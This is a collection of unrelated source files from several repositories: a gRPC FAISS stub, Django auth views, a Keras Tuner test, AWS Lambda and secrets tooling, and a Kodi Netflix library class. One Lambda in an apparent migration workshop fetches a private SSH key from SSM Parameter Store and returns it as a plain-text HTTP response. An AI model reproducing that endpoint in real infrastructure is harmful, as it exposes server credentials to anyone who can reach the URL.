'addVectors': grpc.unary_unary_rpc_method_handler(
servicer.addVectors,
request_deserializer=proto_dot_faiss__pb2.addVecRequest.FromString,
response_serializer=proto_dot_faiss__pb2.addVecResponse.SerializeToString,
),
'deleteVectors': grpc.unary_unary_rpc_method_handler(
servicer.deleteVectors,
request_deserializer=proto_dot_faiss__pb2.deleteVecRequest.FromString,
response_serializer=proto_dot_faiss__pb2.deleteVecResponse.SerializeToString,
),
'getNearest': grpc.unary_unary_rpc_method_handler(
servicer.getNearest,
request_deserializer=proto_dot_faiss__pb2.getNearestRequest.FromString,
response_serializer=proto_dot_faiss__pb2.getNearestResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'faiss.FaissService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
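Client-side wiring for the generated stub follows the usual gRPC pattern; the server address below is an assumption, and the request message fields (defined in faiss_pb2) are not shown in this excerpt.
```python
# Hypothetical client setup; the address is an assumption and request fields are omitted.
import grpc
from proto import faiss_pb2_grpc

channel = grpc.insecure_channel("localhost:50051")
stub = faiss_pb2_grpc.FaissServiceStub(channel)
# Each call takes the matching faiss_pb2 request message, e.g.:
# response = stub.getNearest(faiss_pb2.getNearestRequest(...))
```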
|
{
"source": "jeswinroy/edjango",
"score": 2
}
|
#### File: mysite/pages/views.py
```python
from django.shortcuts import render,redirect
from django.http import HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
def home_view(request):
return render(request, 'pages/index.html')
def register_view(request):
if request.method == 'POST':
full_name = request.POST['full_name']
email = request.POST['email']
password = request.POST['password']
user = User.objects.create_user(email,email=email,password=password)
user.save()
login(request,user)
return redirect('/dashboard')
return render(request, 'pages/register.html')
def login_view(request):
if request.method == 'POST':
email = request.POST['email']
password = request.POST['password']
user=authenticate(request, username=email, password=password)
if user is not None:
login(request,user)
return redirect('/dashboard')
return render(request, 'pages/login.html')
```
|
{
"source": "Jet132/keras-tuner",
"score": 3
}
|
#### File: keras_tuner/integration_tests/end_to_end_test.py
```python
import numpy as np
import pytest
import tensorflow as tf
from tensorflow import keras
import keras_tuner
def get_data():
"""Create random but repetitive dummy MNIST data."""
x = np.random.randint(0, 255, size=(1000, 28, 28))
y = np.random.randint(0, 9, size=(1000,))
train_x = np.repeat(x, repeats=10, axis=0)
train_y = np.repeat(y, repeats=10, axis=0)
val_x, val_y = x, y
rng_state = np.random.get_state()
np.random.shuffle(train_x)
np.random.set_state(rng_state)
np.random.shuffle(train_y)
return (train_x, train_y), (val_x, val_y)
def build_model(hp):
inputs = keras.Input(shape=(28, 28))
x = keras.layers.Reshape((28 * 28,))(inputs)
for i in range(hp.Int("num_layers", 1, 4)):
x = keras.layers.Dense(
units=hp.Int("units_" + str(i), 128, 512, 32, default=256),
activation="relu",
)(x)
x = keras.layers.Dropout(hp.Float("dp", 0.0, 0.6, 0.1, default=0.5))(x)
outputs = keras.layers.Dense(10, activation="softmax")(x)
model = keras.Model(inputs, outputs)
model.compile(
optimizer=keras.optimizers.Adam(
hp.Choice("learning_rate", [1e-2, 2e-3, 5e-4])
),
loss="sparse_categorical_crossentropy",
metrics=["accuracy"],
)
return model
@pytest.mark.parametrize(
"distribution_strategy", [tf.distribute.OneDeviceStrategy("/cpu:0"), None]
)
def test_end_to_end_workflow(tmp_path, distribution_strategy):
tf.get_logger().setLevel("ERROR")
(x, y), (val_x, val_y) = get_data()
x = x.astype("float32") / 255.0
val_x = val_x.astype("float32") / 255.0
tuner = keras_tuner.tuners.RandomSearch(
build_model,
objective="val_accuracy",
max_trials=20,
distribution_strategy=distribution_strategy,
directory=tmp_path,
)
tuner.search_space_summary()
tuner.search(
x=x,
y=y,
epochs=10,
batch_size=128,
callbacks=[keras.callbacks.EarlyStopping(patience=2)],
validation_data=(val_x, val_y),
)
tuner.results_summary()
best_model = tuner.get_best_models(1)[0]
val_loss, val_acc = best_model.evaluate(val_x, val_y)
assert val_acc > 0.955
if __name__ == "__main__":
test_end_to_end_workflow("test_dir", None)
```
|
{
"source": "jet1350/application-migration-with-aws-workshop",
"score": 2
}
|
#### File: src/get_ssh_key_from_ssm/index.py
```python
import boto3
KEY_NAME = "linux_servers_ssh_key"
def get_ssh_pem(AWS_REGION, sts_session):
""" Return parameter from SSM Parameter Store"""
ssm_client = sts_session.client("ssm")
ssh_key = ssm_client.get_parameter(Name=KEY_NAME)['Parameter']['Value']
return ssh_key
def lambda_handler(event, context):
""" Get SSM parameter and return it in HTTP-ready response """
session = boto3.session.Session()
return {
"statusCode": 200,
"body": get_ssh_pem('us-east-1', session),
"headers": {"content-type": "text/plain"}
}
```
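A sketch of invoking the handler locally; it assumes AWS credentials with read access to the `linux_servers_ssh_key` SSM parameter are available in the environment.
```python
# Hypothetical local invocation; requires AWS credentials and the SSM parameter to exist.
if __name__ == "__main__":
    response = lambda_handler(event={}, context=None)
    print(response["statusCode"], response["headers"]["content-type"])
```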
|
{
"source": "jet2018/kennys_final",
"score": 3
}
|
#### File: kennys_final/authentication/views.py
```python
from django.contrib.auth.decorators import login_required
from authentication.models import AddEmployer
from employees.models import DailyPerfomance
# Create your views here.
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User, auth
from django.forms.utils import ErrorList
from django.http import HttpResponse
from .forms import LoginForm, SignUpForm
import datetime
now = datetime.datetime.now()
today = now.date()
time = now.time()
year = now.year
month = now.month
day = now.day
# yesto = now.day-1
# print(yesto)
# login view. Handles caapturing users entry time
def login_view(request):
form = LoginForm(request.POST or None)
msg = None
if request.method == "POST":
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(username=username, password=password)
if user is not None:
# login the user
emp = AddEmployer.objects.get(user=user)
# check if the user had logged in sometime back today
try:
cur_user_instance = User.objects.get(username=username)
msg = 'Welcome back, '+username
except User.DoesNotExist:
msg = 'User does not exist'
# if they have, then just log them in.
if cur_user_instance.last_login and cur_user_instance.last_login.date() == today:
msg = "Welcome back "+username
login(request, user)
# otherwise, record their login time
else:
# record the their time of login
daily_check = DailyPerfomance(
Employer=emp, checked_in_at=time)
daily_check.save()
login(request, user)
return redirect("/", {"msg": msg})
else:
msg = 'Invalid credentials'
else:
msg = 'Error validating the form'
return render(request, "accounts/login.html", {"form": form, "msg": msg})
def register_user(request):
msg = None
success = False
if request.method == "POST":
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get("username")
            raw_password = form.cleaned_data.get("password1")  # field name assumed from Django's UserCreationForm convention
            user = authenticate(username=username, password=raw_password)
msg = 'User created - please <a href="/login">login</a>.'
success = True
# return redirect("/login/")
else:
msg = 'Form is not valid'
else:
form = SignUpForm()
return render(request, "accounts/register.html", {"form": form, "msg": msg, "success": success})
@login_required(login_url='/login/')
def logout(request):
try:
print(time)
# login the user
emp = AddEmployer.objects.get(user=request.user)
print(emp)
# record the their time of login
try:
check = DailyPerfomance.objects.filter(
Employer=emp, date__day=day)
daily_check = check[0]
daily_check.checked_out_at = time
daily_check.save()
auth.logout(request)
except DailyPerfomance.DoesNotExist:
pass
except AddEmployer.DoesNotExist:
pass
return redirect("/")
```
#### File: kennys_final/employees/models.py
```python
from datetime import datetime, date
from django.db.models.signals import post_save
from django.dispatch.dispatcher import receiver
from authentication.models import AddEmployer
from django.db import models
from django.db.models.base import Model
from djmoney.models.fields import MoneyField
from ckeditor.fields import RichTextField
from djmoney.models.managers import understands_money
# Create your models here.
class DailyPerfomance(models.Model):
class Meta:
verbose_name = "Daily perfomance"
verbose_name_plural = "Daily perfomances"
Employer = models.ForeignKey(AddEmployer, on_delete=models.CASCADE)
checked_in_at = models.TimeField()
checked_out_at = models.TimeField(null=True, blank=True)
daily_coverage = RichTextField(
null=True, help_text="What have you worked on today, please include -from -to times", blank=True)
date = models.DateTimeField(auto_now=True)
@property
def hours_worked(self):
hrs = 0
if self.checked_out_at:
c = datetime.combine(date.min, self.checked_out_at) - \
datetime.combine(date.min, self.checked_in_at)
secs = c.seconds
hrs = int(secs/3600)
return hrs
@property
def amount_earned(self):
get_amount = AddEmployer.objects.get(pk=self.Employer.pk)
# currency can be obtained with amount_currency
amount = get_amount.hourly_charge.amount
return 'UGX '+str(self.hours_worked * amount)
def __str__(self):
return self.Employer.user.username
```
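The `hours_worked` property truncates to whole hours; the standalone snippet below reproduces the same arithmetic outside Django, with the two times chosen arbitrarily.
```python
# Standalone illustration of the hours_worked arithmetic; times are invented.
from datetime import datetime, date, time

checked_in_at = time(9, 15)
checked_out_at = time(17, 45)
delta = datetime.combine(date.min, checked_out_at) - datetime.combine(date.min, checked_in_at)
print(int(delta.seconds / 3600))  # 8 -- partial hours are truncated
```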
|
{
"source": "jet76/CS-3120",
"score": 3
}
|
#### File: CS-3120/Final Project/FinalProject_TurnerJoseph.py
```python
import pandas as pd
import os
import cv2
from matplotlib import pyplot as plt
from sklearn import preprocessing
import numpy as np
from sklearn.model_selection._split import train_test_split
from keras.utils.np_utils import to_categorical
from keras.engine.sequential import Sequential
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.core import Dense, Dropout, Flatten
from keras.optimizers import SGD, adadelta, adagrad, adam
from sklearn.metrics import classification_report
from keras.losses import categorical_crossentropy
import random
from numpy.random.mtrand import randint
# path to images
dataset_path = 'cats/'
test_path = 'test/'
# network vars
epochs = 10
batch_size = 32
le = preprocessing.LabelEncoder()
# image vars
image_width, image_height = 128, 128
image_depth = 3
input_shape = (image_width, image_height, image_depth)
# image to predict
image_path = test_path + '96753206_3057061907718284_8582682320677371904_n.jpg'
#image_path = test_path + '46499754_24589.jpg'
image = cv2.imread(image_path)
image = cv2.resize(image, (image_width, image_height))
image = image / 255.0
# display image
plt.imshow(image)
# plt.show()
plt.savefig('image_plot.png')
# reshape image
image = np.array(image).reshape(-1, image_width,
image_height, image_depth)
# exit()
def get_all_breeds():
cats = pd.read_csv('cats.csv', index_col=0, usecols=[0, 1, 8])
images, breeds, data = [], [], []
class_folders = os.listdir(dataset_path)
for class_name in class_folders:
print('processing folder: ' + class_name)
image_list = os.listdir(dataset_path + class_name)
count = 0
for image_name in image_list:
id = image_name.split('_')
# print('Processing ' + class_name + ' #' + id[1])
cat = cats.loc[cats['id'] == int(id[0])]
# print(cat['id'].values[0])
if not cat.empty:
if not cat['breed'].values[0] == class_name:
print(class_name + '/' + image_name +
' listed as ' + cat['breed'].values[0])
else:
breeds.append(cat['breed'].values[0])
image = cv2.imread(dataset_path+class_name+'/' +
image_name)
image = cv2.resize(image, (image_width, image_height))
images.append(image)
count += 1
data.append([class_name, count])
return images, breeds, data
def get_breed_data(breed):
breed_path = dataset_path + breed + '/'
cats = pd.read_csv('cats.csv', index_col=0, usecols=[0, 1, 4, 5, 6, 8])
images, ages, genders, sizes = [], [], [], []
image_list = os.listdir(breed_path)
for image_name in image_list:
id = image_name.split('_')
# print('Processing ' + class_name + ' #' + id[1])
cat = cats.loc[cats['id'] == int(id[0])]
# print(cat['id'].values[0])
if not cat.empty:
if not cat['breed'].values[0] == breed:
print(breed + '/' + image_name +
' listed as ' + cat['breed'].values[0])
else:
if cat['gender'].values[0] == 'Male' or cat['gender'].values[0] == 'Female':
ages.append(cat['age'].values[0])
genders.append(cat['gender'].values[0])
sizes.append(cat['size'].values[0])
image = cv2.imread(breed_path +
image_name)
image = cv2.resize(image, (image_width, image_height))
images.append(image)
return images, ages, genders, sizes
def process_images(images):
images = np.array(images).reshape(-1, image_width,
image_height, image_depth) # reshape image array
    images = images / 255  # scale pixel values to [0, 1]
return images
def process_data(data):
labels = le.fit_transform(data)
classes = le.classes_
count = len(classes)
return np.array(data), labels, classes, count, to_categorical(labels, count)
# the following model is based on 9_keras_mnist_cnn.py by <NAME>
def get_feng_jiang(count):
print('[INFO] constructing model...')
model = Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), padding="same",
activation='relu',
input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (5, 5), padding="same", activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1024, activation='relu'))
model.add(Dense(count, activation='softmax'))
print('[INFO] compiling model...')
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss="categorical_crossentropy", optimizer=sgd,
metrics=["accuracy"])
return model
# the following model is based on
# Classify butterfly images with deep learning in Keras
# by <NAME>
# https://towardsdatascience.com/classify-butterfly-images-with-deep-learning-in-keras-b3101fe0f98
def get_bert_carremans(count):
print('[INFO] constructing model...')
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(3, 3), strides=(1, 1), padding="same",
input_shape=input_shape, activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=2))
model.add(Conv2D(filters=64, kernel_size=(2, 2), strides=(
1, 1), padding="valid", activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=2))
model.add(Flatten())
model.add(Dense(units=64, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(units=count, activation='sigmoid'))
print('[INFO] compiling model...')
model.compile(loss='binary_crossentropy',
optimizer='rmsprop', metrics=['accuracy'])
return model
def get_joe_turner(count):
print('[INFO] constructing model...')
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.20))
model.add(Dense(count, activation='softmax'))
print('[INFO] compiling model...')
model.compile(loss="categorical_crossentropy", optimizer='adagrad',
metrics=["accuracy"])
return model
# gather breed data
print('[INFO] processing dataset...')
images, breeds, data = get_all_breeds()
# output number of images per breed
print('[INFO] dataset composition:')
for datum in data:
print(datum[0] + ': ' + str(datum[1]))
# process images
images = process_images(images)
# process breed data
breeds, breed_labels, breed_classes, breed_count, breed_categories = process_data(
breeds)
# BEGIN BREED PREDICTION
# split the breed data
breed_train_x, breed_test_x, breed_train_y, breed_test_y = train_test_split(
images, breed_categories)
print('[INFO] train test split done')
# construct breed model
model = get_feng_jiang(breed_count)
# train the model
print('[INFO] training model...')
H = model.fit(breed_train_x, breed_train_y, validation_data=(breed_test_x, breed_test_y),
epochs=epochs, batch_size=batch_size)
# evaluate the network
print("[INFO] evaluating network...")
breed_predictions = model.predict(breed_test_x, batch_size=batch_size)
breed_report = classification_report(breed_test_y.argmax(axis=1),
breed_predictions.argmax(axis=1))
print(breed_report)
predicted_breeds = model.predict_classes(image)
predicted_breed = breed_classes[predicted_breeds[0]]
print('[INFO] predicted breed: ' + predicted_breed)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy - Breed")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
# plt.show()
plt.savefig('breed_tla_plot.png')
del breed_report, breed_predictions, H, model, breed_train_x, breed_test_x, breed_train_y, breed_test_y, breeds, breed_classes, breed_count, breed_categories, images, data
# gather info for predicted breed
print('[INFO] processing ' + predicted_breed + '...')
breed_images, breed_ages, breed_genders, breed_sizes = get_breed_data(
predicted_breed)
# process predicted breed images
print('[INFO] processing ' + predicted_breed + ' images')
breed_images = process_images(breed_images)
# BEGIN AGE PREDICTION
# process age data
print('[INFO] processing ' + predicted_breed + ' ages')
ages, age_labels, age_classes, age_count, age_categories = process_data(
breed_ages)
# split data
age_train_x, age_test_x, age_train_y, age_test_y = train_test_split(
breed_images, age_categories)
print('[INFO] train test split done')
# construct age model
model = get_joe_turner(age_count)
# train age model
print('[INFO] training model...')
H = model.fit(age_train_x, age_train_y, validation_data=(age_test_x, age_test_y),
epochs=epochs, batch_size=batch_size)
# evaluate the age network
print("[INFO] evaluating network...")
age_predictions = model.predict(age_test_x, batch_size=batch_size)
age_report = classification_report(age_test_y.argmax(axis=1),
age_predictions.argmax(axis=1))
print(age_report)
# predict age
predicted_ages = model.predict_classes(image)
predicted_age = age_classes[predicted_ages[0]]
print('[INFO] predicted age: ' + predicted_age)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy - Age")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
# plt.show()
plt.savefig('age_tla_plot.png')
del age_report, age_predictions, H, model, age_train_x, age_test_x, age_train_y, age_test_y, ages, age_classes, age_count, age_categories
# BEGIN GENDER PREDICTION
# process gender data
print('[INFO] processing ' + predicted_breed + ' genders')
genders, gender_labels, gender_classes, gender_count, gender_categories = process_data(
breed_genders)
# split gender data
gender_train_x, gender_test_x, gender_train_y, gender_test_y = train_test_split(
breed_images, gender_categories)
print('[INFO] train test split done')
# construct gender model
model = get_bert_carremans(gender_count)
# train gender model
print('[INFO] training model...')
H = model.fit(gender_train_x, gender_train_y, validation_data=(gender_test_x, gender_test_y),
epochs=epochs, batch_size=batch_size)
# evaluate the gender network
print("[INFO] evaluating network...")
gender_predictions = model.predict(gender_test_x, batch_size=batch_size)
gender_report = classification_report(gender_test_y.argmax(axis=1),
gender_predictions.argmax(axis=1))
print(gender_report)
# predict gender
predicted_genders = model.predict_classes(image)
predicted_gender = gender_classes[predicted_genders[0]]
print('[INFO] predicted gender: ' + predicted_gender)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy - Gender")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
# plt.show()
plt.savefig('gender_tla_plot.png')
del gender_report, gender_predictions, H, model, gender_train_x, gender_test_x, gender_train_y, gender_test_y, genders, gender_classes, gender_count, gender_categories
```
#### File: CS-3120/Midterm HW/MidtermHW_JoeTurner.py
```python
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn import metrics
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import LogisticRegression
def plot_confusion_matrix(cnf_matrix, name):
plt.clf()
cm = pd.DataFrame(cnf_matrix, index=np.unique(
y), columns=np.unique(y))
cm.index.name = "Actual"
cm.columns.name = "Predicted"
sns.heatmap(cm, annot=True, cmap="YlGnBu", fmt='g')
plt.title(name + ' Confusion Matrix')
plt.tight_layout()
plt.show()
# plt.savefig(name + '.png', dpi=150)
iris = pd.read_csv('iris.csv')
# optional output
# print(iris.head())
# sns.pairplot(data=iris, hue='variety', palette='Set2')
# plt.show()
# plt.savefig('pairplot.png', dpi=300)
iris = np.array(iris)
x = iris[:, :-1]
# print(x)
y = iris[:, -1]
# print(y)
le = preprocessing.LabelEncoder()
labels = le.fit_transform(y)
# print(le.classes_)
x_train, x_test, y_train, y_test = train_test_split(
x, y, test_size=0.30, random_state=0)
# Support Vector Machine
Gamma = 0.001
C = 1
model = SVC(kernel='linear', C=C, gamma=Gamma)
model.fit(x_train, y_train)
y_pred = model.predict(x_test)
svm_cnf_matrix = confusion_matrix(y_test, y_pred)
print('\nSupport Vector Machine')
print(classification_report(y_test, y_pred))
print(svm_cnf_matrix)
# plot_confusion_matrix(svm_cnf_matrix, 'SVM')
# K Nearest Neighbors
x_knn_test, x_valid, y_knn_test, y_valid = train_test_split(
x_test, y_test, test_size=0.33, random_state=0)
K = [3, 5, 7]
L = [1, 2]
best_k = best_l = best_acc = 0
for l in L:
for k in K:
model = KNeighborsClassifier(n_neighbors=k, p=l)
model.fit(x_train, y_train)
acc = metrics.accuracy_score(y_valid, model.predict(
x_valid))
# print("L" + str(l) + ", " + "k=" + str(k) + ", Accuracy=" + str(acc))
if acc > best_acc:
best_acc = acc
best_k = k
best_l = l
# print("Best: L" + str(best_l) + ", k=" + str(best_k) + ", Accuracy=" + str(best_acc))
model = KNeighborsClassifier(n_neighbors=best_k, p=best_l)
model.fit(x_train, y_train)
y_pred = model.predict(x_knn_test)
knn_cnf_matrix = metrics.confusion_matrix(y_knn_test, y_pred)
print("\nK Nearest Neighbors (L" + str(best_l) + ", k=" + str(best_k) + ")")
print(classification_report(y_knn_test, model.predict(
x_knn_test), target_names=le.classes_))
print(knn_cnf_matrix)
# plot_confusion_matrix(knn_cnf_matrix, 'KNN')
# Logistic Regression
logreg = LogisticRegression()
logreg.fit(x_train, y_train)
y_pred = logreg.predict(x_test)
lr_cnf_matrix = metrics.confusion_matrix(y_test, y_pred)
print("\nLogistic Regression")
print(classification_report(y_test, y_pred))
print(lr_cnf_matrix)
# plot_confusion_matrix(lr_cnf_matrix, 'LR')
```
|
{
"source": "jet76/IMDB-TV-Scraper",
"score": 3
}
|
#### File: tests/e2e/helper.py
```python
from typing import List
import os
def get_file_paths_and_imdb_ids(directory_name: str) -> zip:
"""directory_name should be cli or TBD"""
file_paths = []
imdb_ids = []
current_directory = os.path.dirname(__file__)
path = f'{current_directory}{os.sep}json{os.sep}{directory_name}'
for root, dirs, files in os.walk(path):
for name in files:
file_paths.append(os.path.join(root, name))
imdb_ids.append(name.split('.')[0])
return zip(file_paths, imdb_ids)
```
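Hypothetical usage, assuming `tests/e2e/json/cli/` contains files named `<imdb_id>.json` as the docstring implies.
```python
# Hypothetical usage; the directory layout is assumed from the docstring above.
for file_path, imdb_id in get_file_paths_and_imdb_ids("cli"):
    print(imdb_id, "->", file_path)
```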
|
{
"source": "jet76/OMDb-Discord-Bot",
"score": 2
}
|
#### File: OMDb-Discord-Bot/omdb_bot/__main__.py
```python
import os
import discord
from discord.ext import commands
from discord.ext.commands import CommandNotFound
from dotenv import load_dotenv
from omdb import OMDb
description = '''OMDb Bot.'''
#intents = discord.Intents.default()
#intents.members = True
bot = commands.Bot(command_prefix='!', description=description)
@bot.event
async def on_ready():
print('Logged in as')
print(bot.user.name)
print(bot.user.id)
print('------')
@bot.event
async def on_command_error(ctx, error):
if isinstance(error, CommandNotFound):
return
raise error
load_dotenv()
DISCORD_TOKEN = os.getenv('DISCORD_TOKEN')
OMDB_API_KEY = os.getenv('OMDB_API_KEY')
bot.add_cog(OMDb(bot, OMDB_API_KEY))
bot.run(DISCORD_TOKEN)
```
|
{
"source": "jet86/optimism",
"score": 2
}
|
#### File: watcher-api/Rinkeby/watcher_getCrossDomainMessage.py
```python
import json
import yaml
import pymysql
import boto3
import string
import random
import time
import requests
import redis
def watcher_getCrossDomainMessage(event, context):
# Parse incoming event
body = json.loads(event["body"])
receiptHash = body.get("hash")
# Read YML
with open("env.yml", 'r') as ymlfile:
        config = yaml.load(ymlfile, Loader=yaml.SafeLoader)
# Get MySQL host and port
endpoint = config.get('RDS_ENDPOINT')
user = config.get('RDS_MYSQL_NAME')
dbpassword = config.get('RDS_MYSQL_PASSWORD')
dbname = config.get('RDS_DBNAME')
con = pymysql.connect(endpoint, user=user, db=dbname,
                          passwd=dbpassword, connect_timeout=5)
with con:
try:
cur = con.cursor()
cur.execute("""SELECT hash, blockNumber, `from`, `to`, timestamp, crossDomainMessage, crossDomainMessageFinalize, fastRelay, crossDomainMessageEstimateFinalizedTime,
l1Hash, l1BlockNumber, l1BlockHash, l1From, l1To
              FROM receipt WHERE hash=%s""", (receiptHash,)
)
transactionDataRaw = cur.fetchall()[0]
transactionData = {
"hash": transactionDataRaw[0],
"blockNumber": int(transactionDataRaw[1]),
"from": transactionDataRaw[2],
"to": transactionDataRaw[3],
"timestamp": transactionDataRaw[4],
"crossDomainMessage": transactionDataRaw[5],
"crossDomainMessageFinalize": transactionDataRaw[6],
"fastRelay": transactionDataRaw[7],
"crossDomainMessageEstimateFinalizedTime": transactionDataRaw[8],
"l1Hash": transactionDataRaw[9],
"l1BlockNumber": transactionDataRaw[10],
"l1BlockHash": transactionDataRaw[11],
"l1From": transactionDataRaw[12],
"l1To": transactionDataRaw[13]
}
except Exception as e:
transactionData = {}
con.close()
response = {
"statusCode": 201,
"headers": {
"Access-Control-Allow-Origin": "*",
"Access-Control-Allow-Credentials": True,
"Strict-Transport-Security": "max-age=63072000; includeSubdomains; preload",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "DENY",
"X-XSS-Protection": "1; mode=block",
"Referrer-Policy": "same-origin",
"Permissions-Policy": "*",
},
"body": json.dumps(transactionData),
}
return response
```
#### File: optimism/ops_omgx/aws-secrets-importer.py
```python
import json
import re
import subprocess
import sys, getopt
from ruamel.yaml import YAML
def main(argv):
inputfile = ''
description = "Create Secret Manager"
secret_name = ''
region = 'us-east-1'
profile = 'default'
if (len(sys.argv) <= 1 ) or (len(sys.argv) > 11):
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit()
try:
opts, args = getopt.getopt(argv,"hi:d:n:r:p:",["ifile=","name=","description=","region=","profile="])
print(opts)
except getopt.GetoptError:
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-d", "--description"):
description = arg
elif opt in ("-n", "--name"):
secret_name = arg
elif opt in ("-r", "--region"):
region = arg
elif opt in ("-p", "--profile"):
profile = arg
else:
print("Else")
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit()
with open(inputfile) as vars_file:
pattern = "="
secrets = {}
for line in vars_file:
if re.search(pattern, line):
variables = line.strip()
clean = re.sub(r"^- ", "", variables)
key, value = clean.split('=')
secrets[key] = value
cmd = ['aws', 'secretsmanager', 'create-secret', '--region', region, '--profile', profile, '--description', description, '--name', secret_name, '--secret-string', json.dumps(secrets)]
result = subprocess.run(cmd)
print(result)
if __name__ == "__main__":
main(sys.argv[1:])
```
|
{
"source": "jet86/plugin.video.netflix",
"score": 2
}
|
#### File: resources/lib/Library.py
```python
import os
from shutil import rmtree
from utils import noop
try:
import cPickle as pickle
except:
import pickle
class Library:
"""Exports Netflix shows & movies to a local library folder"""
series_label = 'shows'
"""str: Label to identify shows"""
movies_label = 'movies'
"""str: Label to identify movies"""
db_filename = 'lib.ndb'
"""str: (File)Name of the store for the database dump that contains all shows/movies added to the library"""
def __init__ (self, root_folder, library_settings, log_fn=noop):
"""Takes the instances & configuration options needed to drive the plugin
Parameters
----------
        root_folder : :obj:`str`
            Base plugin data folder (holds the library DB and the default export folders)
        library_settings : :obj:`dict` of :obj:`str`
            Library settings ('enablelibraryfolder', 'customlibraryfolder')
log_fn : :obj:`fn`
optional log function
"""
self.base_data_path = root_folder
self.enable_custom_library_folder = library_settings['enablelibraryfolder']
self.custom_library_folder = library_settings['customlibraryfolder']
self.db_filepath = os.path.join(self.base_data_path, self.db_filename)
self.log = log_fn
# check for local library folder & set up the paths
lib_path = self.base_data_path if self.enable_custom_library_folder != 'true' else self.custom_library_folder
self.movie_path = os.path.join(lib_path, self.movies_label)
self.tvshow_path = os.path.join(lib_path, self.series_label)
# check if we need to setup the base folder structure & do so if needed
self.setup_local_netflix_library(source={
self.movies_label: self.movie_path,
self.series_label: self.tvshow_path
})
# load the local db
self.db = self._load_local_db(filename=self.db_filepath)
def setup_local_netflix_library (self, source):
"""Sets up the basic directories
Parameters
----------
source : :obj:`dict` of :obj:`str`
            Dictionary with directories to be created
"""
for label in source:
if not os.path.exists(source[label]):
os.makedirs(source[label])
def write_strm_file(self, path, url):
"""Writes the stream file that Kodi can use to integrate it into the DB
Parameters
----------
path : :obj:`str`
Filepath of the file to be created
url : :obj:`str`
Stream url
"""
with open(path, 'w+') as f:
f.write(url)
f.close()
def _load_local_db (self, filename):
"""Loads the local db file and parses it, creates one if not existent
Parameters
----------
filename : :obj:`str`
Filepath of db file
Returns
-------
:obj:`dict`
Parsed contents of the db file
"""
# if the db doesn't exist, create it
if not os.path.isfile(filename):
data = {self.movies_label: {}, self.series_label: {}}
self.log('Setup local library DB')
self._update_local_db(filename=filename, db=data)
return data
with open(filename) as f:
data = pickle.load(f)
if data:
return data
else:
return {}
def _update_local_db (self, filename, db):
"""Updates the local db file with new data
Parameters
----------
filename : :obj:`str`
Filepath of db file
db : :obj:`dict`
Database contents
Returns
-------
bool
Update has been successfully executed
"""
if not os.path.isdir(os.path.dirname(filename)):
return False
with open(filename, 'w') as f:
f.truncate()
pickle.dump(db, f)
return True
def movie_exists (self, title, year):
"""Checks if a movie is already present in the local DB
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
Movie exists in DB
"""
movie_meta = '%s (%d)' % (title, year)
return movie_meta in self.db[self.movies_label]
def show_exists (self, title):
"""Checks if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
Show exists in DB
"""
show_meta = '%s' % (title)
